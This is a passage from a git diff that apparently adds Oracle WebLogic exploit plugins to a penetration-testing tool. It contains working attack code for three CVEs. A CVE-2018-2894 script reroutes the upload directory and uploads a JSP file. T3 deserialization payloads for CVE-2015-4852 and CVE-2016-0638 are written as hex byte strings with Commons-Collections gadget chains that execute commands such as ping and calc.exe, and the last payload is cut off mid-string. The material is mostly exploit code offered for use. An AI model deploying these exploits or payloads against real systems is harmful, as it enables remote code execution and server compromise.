\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +# adjust header for appropriate message length +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(2048) +print >>sys.stderr, 'received "%s"' % data diff --git a/plugins/weblogic_exp/CVE_2018_2894.py b/plugins/weblogic_exp/CVE_2018_2894.py new file mode 100644 index 0000000..72c57b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2894.py @@ -0,0 +1,132 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import re +import sys +import time +import argparse +import requests +import traceback +import xml.etree.ElementTree as ET + + +def get_current_work_path(host): + geturl = host + "/ws_utc/resources/setting/options/general" + ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} + values = [] + try: + request = requests.get(geturl) + if request.status_code == 404: + exit("[-] {} don't exists CVE-2018-2894".format(host)) + elif "Deploying Application".lower() in request.text.lower(): + print("[*] First Deploying Website Please wait a moment ...") + time.sleep(20) + request = requests.get(geturl, headers=ua) + if "" in request.content: + root = ET.fromstring(request.content) + value = root.find("section").find("options") + for e in value: + for sub in e: + if e.tag == "parameter" and sub.tag == "defaultValue": + values.append(sub.text) + except requests.ConnectionError: + exit("[-] Cannot connect url: {}".format(geturl)) + if values: + return values[0] + else: + print("[-] Cannot get current work path\n") + exit(request.content) + + +def get_new_work_path(host): + origin_work_path = get_current_work_path(host) + works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css" + if "user_projects" in origin_work_path: + if "\\" in origin_work_path: + works = works.replace("/", "\\") + current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains" + dir_len = len(current_work_home.split("\\")) + domain_name = origin_work_path.split("\\")[dir_len] + current_work_home += "\\" + domain_name + works + else: + current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains" + dir_len = len(current_work_home.split("/")) + domain_name = origin_work_path.split("/")[dir_len] + current_work_home += "/" + domain_name + works + else: + current_work_home = origin_work_path + print("[*] cannot handle current work home dir: {}".format(origin_work_path)) + return current_work_home + + +def set_new_upload_path(host, path): + data = { + "setting_id": "general", + "BasicConfigOptions.workDir": path, + "BasicConfigOptions.proxyHost": "", + "BasicConfigOptions.proxyPort": "80"} + request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) + if "successfully" in request.content: + return True + else: + print("[-] Change New Upload Path failed") + exit(request.content) + + +def upload_webshell(host, uri): + set_new_upload_path(host, get_new_work_path(host)) + files = { + "ks_edit_mode": "false", + "ks_password_front": password, + "ks_password_changed": "true", + "ks_filename": ("360sglab.jsp", upload_content) + } + + request = requests.post(host + uri, files=files) + response = request.text + match = re.findall("(.*?)", response) + if match: + tid = match[-1] + shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp" + if upload_content in requests.get(shell_path, headers=headers).content: + print("[+] {} exists CVE-2018-2894".format(host)) + print("[+] Check URL: {} ".format(shell_path)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + + +if __name__ == "__main__": + start = time.time() + password = "360sglab" + url = "/ws_utc/resources/setting/keystore" + parser = argparse.ArgumentParser() + parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str, + help="target, such as: http://example.com:7001") + + upload_content = "360sglab test" + headers = { + 'Content-Type': 'application/x-www-form-urlencoded', + 'X-Requested-With': 'XMLHttpRequest', } + + if len(sys.argv) == 1: + sys.argv.append('-h') + args = parser.parse_args() + target = args.target + + target = target.rstrip('/') + if "://" not in target: + target = "http://" + target + try: + upload_webshell(target, url) + except Exception as e: + print("[-] Error: \n") + traceback.print_exc() \ No newline at end of file diff --git a/plugins/weblogic_exp/__init__.py b/plugins/weblogic_exp/__init__.py new file mode 100644 index 0000000..0002af2 --- /dev/null +++ b/plugins/weblogic_exp/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' diff --git a/plugins/weblogic_plugin.py b/plugins/weblogic_plugin.py new file mode 100644 index 0000000..44103ae --- /dev/null +++ b/plugins/weblogic_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":[], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2015_4852.py b/plugins/weblogic_poc/CVE_2015_4852.py new file mode 100644 index 0000000..d2982d1 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2015_4852.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import struct +from binascii import unhexlify + +def run(rip,rport): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_address = (rip,rport) + sock.connect(server_address) + + headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' + sock.sendall(headers) + + data = sock.recv(1024) + + chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + + + chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + + totallength = len(chunk1) + len(chunk2) + len(chunk3) + + len_hex = hex(totallength) + + len_hex = len_hex.replace('0x', '0') + + + s1 = len_hex[:2] + s2 = len_hex[2:4] + len_hex = unhexlify(s1 + s2) + + chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + payload = chunk1 + chunk2 + chunk3 + + + payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) + + sock.send(payload) + response = sock.recv(15000) + print(("[*]测试返回内容为{}".format(response))) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_0638.py b/plugins/weblogic_poc/CVE_2016_0638.py new file mode 100644 index 0000000..4a17445 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_0638.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-0638'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac